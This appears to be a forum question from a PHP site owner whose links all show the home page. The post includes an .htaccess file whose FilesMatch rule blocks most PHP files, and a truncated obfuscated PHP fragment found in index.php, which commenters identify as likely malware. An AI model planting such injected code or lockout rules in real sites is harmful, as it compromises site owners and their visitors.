# URL redirecting to right page but content showing of Home page in every link in PHP

Tags: php

```
<FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
```

this .httpaccess file

Why it is happening, some junk code also there in index.php file

```
<?php /*-FQ%@A%-*/error_reporting(0); $WeuF /*-Moq%}{x%FHId79LEz-*/=/*-BpnY8ibhGbWx4)....etc
```

like this

Comment: Is it a Wordpress site, that junk code in index.php may be a result of malware

Comment: it is not a WordPress website, I removed that junk code also from index.php, but still same issue happening

Comment: WordPress or not, it totally looks like malware. Apache does not have any special knowledge about PHP, it couldn't possibly inject PHP code in the source files even if it wanted to.

Comment: is there any way to solve this issue, I removed that junk code from index.php, but still same problem happening